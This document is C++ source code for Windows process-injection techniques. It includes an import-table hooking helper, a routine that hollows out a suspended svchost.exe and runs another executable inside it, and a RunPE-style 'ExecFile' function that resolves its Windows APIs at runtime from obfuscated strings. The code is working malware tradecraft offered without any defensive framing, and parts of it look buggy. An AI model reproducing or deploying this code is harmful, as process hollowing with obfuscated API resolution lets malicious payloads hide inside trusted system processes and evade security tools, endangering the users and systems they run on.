PIMAGE_THUNK_DATA32 IATHookInjector::ReadRemoteIAT(HANDLE hProcess, LPCVOID lpImageBaseAddress, PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor) const
{
DWORD dwThunkArrayLen = BUFFER_SIZE / sizeof(IMAGE_THUNK_DATA32);
auto pIAT = new IMAGE_THUNK_DATA32[dwThunkArrayLen];
auto bSuccess = ReadProcessMemory(hProcess, LPCVOID(DWORD(lpImageBaseAddress) + pImageImportDescriptor->FirstThunk), pIAT, BUFFER_SIZE, nullptr);
if (!bSuccess)
{
return nullptr;
}
return pIAT;
}
PIMAGE_IMPORT_DESCRIPTOR IATHookInjector::ReadRemoteImportDescriptors(HANDLE hProcess, LPCVOID lpImageBaseAddress, PIMAGE_DATA_DIRECTORY pImageDataDirectory) const
{
auto importDirectory = pImageDataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
auto pImportDescriptors = new IMAGE_IMPORT_DESCRIPTOR[importDirectory.Size / sizeof(IMAGE_IMPORT_DESCRIPTOR)];
auto bSuccess = ReadProcessMemory(hProcess, LPCVOID(DWORD(lpImageBaseAddress) + importDirectory.VirtualAddress), pImportDescriptors, importDirectory.Size, nullptr);
if (!bSuccess)
{
return nullptr;
}
return pImportDescriptors;
}
PEB* IATHookInjector::ReadRemotePEB(HANDLE hProcess) const
{
auto dwPEBAddress = FindRemotePEB(hProcess);
printf("PEB Address: 0x%x\n", dwPEBAddress);
PEB* pPEB = new PEB();
SIZE_T* bytesRead = nullptr;
auto bSuccess = ReadProcessMemory(hProcess, LPCVOID(dwPEBAddress), pPEB, sizeof(_PEB), bytesRead);
printf("ReadProcMemory %d\n", GetLastError());
printf("Read: %p\n", bytesRead);
if (!bSuccess)
{
return nullptr;
}
return pPEB;
}
BOOL GetSetThreadContext_Injection()
{
TCHAR lpApplicationName[] = _T("C:\\Windows\\System32\\svchost.exe");
TCHAR lpApplicationName2[] = _T("C:\\masm32\\examples\\dialogs_later\\basic\\basicdlg.exe");
BOOL bResult;
STARTUPINFO StartupInfo;
PROCESS_INFORMATION ProcessInfo;
SecureZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
SecureZeroMemory(&ProcessInfo, sizeof(PPROCESS_INFORMATION));
// Create the hollowed process in suspended mode
bResult = CreateProcess(lpApplicationName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &StartupInfo, &ProcessInfo);
if (bResult == NULL){
print_last_error(_T("CreateProcess"));
return FALSE;
}
// Allocate space for context structure
PCONTEXT pContext;
LPVOID pTargetImageBase = NULL;
pContext = PCONTEXT(VirtualAlloc(NULL, sizeof(LPVOID), MEM_COMMIT, PAGE_READWRITE));
if (pContext == NULL) {
print_last_error(_T("VirtualAlloc"));
return FALSE;
}
// Get the thread context of target
pContext->ContextFlags = CONTEXT_FULL;
bResult = GetThreadContext(ProcessInfo.hThread, pContext);
if (bResult == NULL) {
print_last_error(_T("GetThreadContext"));
return FALSE;
}
// Read the image base address of target
ReadProcessMemory(ProcessInfo.hProcess, LPCVOID(pContext->Ebx + 8), pTargetImageBase, 4, NULL);
// Opening source image
HANDLE hFile = CreateFile(lpApplicationName2, GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
print_last_error(_T("CreateFile"));
return FALSE;
}
// Reading the file
DWORD dwSize = GetFileSize(hFile, 0);
DWORD dwBytesRead;
PBYTE pBuffer = new BYTE[dwSize];
ReadFile(hFile, pBuffer, dwSize, &dwBytesRead, 0);
PIMAGE_SECTION_HEADER pImageSectionHeader;
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pBuffer;
if (pDosHeader->e_magic == IMAGE_DOS_SIGNATURE)
{
PIMAGE_NT_HEADERS32 pNTHeaders = PIMAGE_NT_HEADERS(DWORD(pBuffer) + pDosHeader->e_lfanew);
if (pNTHeaders->Signature == IMAGE_NT_SIGNATURE)
{
if (DWORD(pTargetImageBase) == pNTHeaders->OptionalHeader.ImageBase)
{
pNtUnmapViewOfSection NtUnmapViewOfSection;
NtUnmapViewOfSection = (pNtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
NtUnmapViewOfSection(ProcessInfo.hProcess, pTargetImageBase);
}
LPVOID pImageBase;
pImageBase = VirtualAllocEx(ProcessInfo.hProcess, LPVOID(pNTHeaders->OptionalHeader.ImageBase), pNTHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pImageBase == NULL) {
print_last_error(_T("VirtualAllocEx"));
return FALSE;
}
WriteProcessMemory(ProcessInfo.hProcess, pImageBase, pBuffer, pNTHeaders->OptionalHeader.SizeOfHeaders, NULL);
for (int Count = 0; Count < pNTHeaders->FileHeader.NumberOfSections; Count++)
{
pImageSectionHeader = PIMAGE_SECTION_HEADER(DWORD(pBuffer) + pDosHeader->e_lfanew + 248 + (Count * 40));
WriteProcessMemory(ProcessInfo.hProcess, LPVOID(DWORD(pImageBase) + pImageSectionHeader->VirtualAddress), LPVOID(DWORD(pBuffer) + pImageSectionHeader->PointerToRawData), pImageSectionHeader->SizeOfRawData, NULL);
}
WriteProcessMemory(ProcessInfo.hProcess, LPVOID(pContext->Ebx + 8), LPVOID(&pNTHeaders->OptionalHeader.ImageBase), 4, NULL);
pContext->Eax = DWORD(pImageBase) + pNTHeaders->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(ProcessInfo.hThread, LPCONTEXT(pContext));
ResumeThread(ProcessInfo.hThread);
}
}
return TRUE;
}
// ExecFile based on RUNPE work (c) Someone 2009
void ExecFile(LPSTR szFilePath, LPVOID pFile) {
// On va creer un process suspendu, demapper le nouveau process, aligner la taille avce notre pe
// recopier notre pe dans les sections, demarre et sauter dans le process
PIMAGE_DOS_HEADER IDH; // Structure http://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
PIMAGE_NT_HEADERS INH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
PCONTEXT CTX;
PDWORD dwImageBase;
PNtUnmapViewOfSection xNtUnmapViewOfSection;
PWriteProcessMemory xWriteProcessMemory ;
PNtResumeThread xNtResumeThread;
PGetThreadContext xGetThreadContext;
PSetThreadContext xSetThreadContext;
PGetProcAddress xGetProcAddress;
PCreateProcessA xCreateProcessA;
PReadProcessMemory xReadProcessMemory;
PLoadLibrary xLoadLibrary;
PVirtualAllocEx xVirtualAllocEx;
LPVOID pImageBase;
int Count;
int extern str_ntdll() asm ("str_ntdll");
int extern str_kernel32() asm ("str_kernel32");
int extern str_ReadProcessMemory() asm ("str_ReadProcessMemory");
int extern str_GetProcAddress() asm ("str_GetProcAddress");
int extern str_ReadProcAddress() asm ("str_ReadProcAddress");
int extern str_WriteProcessMemory() asm ("str_WriteProcessMemory");
int extern str_GetThreadContext() asm ("str_GetThreadContext");
int extern str_SetThreadContext() asm ("str_SetThreadContext");
int extern str_ReadProcessMemory() asm ("str_ReadProcessMemory");
int extern str_CreateProcessA() asm ("str_CreateProcessA");
int extern str_NtResumeThread() asm ("str_NtResumeThread");
int extern str_NtUnmapViewOfSection() asm ("str_NtUnmapViewOfSection");
int extern str_VirtualAllocEx() asm ("str_VirtualAllocEx");
xLoadLibrary = (PLoadLibrary) getfunction (findkernel() ,ostring((unsigned char *) &str_LoadLibrary ));
HINSTANCE Hkernel32 = xLoadLibrary((LPCTSTR) ostring((unsigned char *) &str_kernel32 ));
HINSTANCE Hntdll = xLoadLibrary((LPCTSTR) ostring((unsigned char * ) &str_ntdll ));
xGetProcAddress = (PGetProcAddress) getfunction(findkernel(),ostring((unsigned char *) &str_GetProcAddress));
xSetThreadContext = ( PSetThreadContext) getfunction(findkernel(),ostring((unsigned char *)&str_SetThreadContext));
xNtResumeThread = (PNtResumeThread)(xGetProcAddress(Hntdll,(LPCSTR) ostring((unsigned char *) &str_NtResumeThread)));
IDH = PIMAGE_DOS_HEADER(pFile);
if (IDH->e_magic == IMAGE_DOS_SIGNATURE) { // TEST MZ
INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
if (INH->Signature == IMAGE_NT_SIGNATURE) { // TESTPE
RtlZeroMemory(&SI, sizeof(SI));
RtlZeroMemory(&PI, sizeof(PI));
// Cree un process etat suspendu
xCreateProcessA = (PCreateProcessA) (xGetProcAddress(Hkernel32,(LPCSTR) ostring((unsigned char *) &str_CreateProcessA)));
if (xCreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) {
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
xGetThreadContext = ( PGetThreadContext) getfunction(findkernel(),ostring((unsigned char *)&str_GetThreadContext));
if (xGetThreadContext(PI.hThread, LPCONTEXT(CTX))){
xReadProcessMemory = (PReadProcessMemory) getfunction(findkernel(), ostring((unsigned char *)&str_ReadProcessMemory));
xReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
// Mappe l'exe dans la thread
if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase) {
vaauxfraises(DWORD(dwImageBase));
xNtUnmapViewOfSection = (PNtUnmapViewOfSection)(xGetProcAddress(Hntdll,(LPCSTR) ostring((unsigned char *)&str_NtUnmapViewOfSection)));
xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
}
xVirtualAllocEx = ( PVirtualAllocEx) getfunction(findkernel(),ostring((unsigned char *)&str_VirtualAllocEx));
pImageBase = xVirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
if (pImageBase) {
// HMODULE aKERNEL32=LoadLibrary(vKERNEL32);
xWriteProcessMemory = (PWriteProcessMemory) getfunction(findkernel(),ostring((unsigned char *)&str_WriteProcessMemory));
xWriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++) {
ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
startrand();
xWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
}
xWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
// Et on demarre la thread
xSetThreadContext = ( PSetThreadContext) getfunction(findkernel(),ostring((unsigned char *)&str_SetThreadContext));
xSetThreadContext(PI.hThread, LPCONTEXT(CTX));
startrand();
xNtResumeThread(PI.hThread);
}
}
}
}
}
GetLastError();
VirtualFree(pFile, 0, MEM_RELEASE);
}
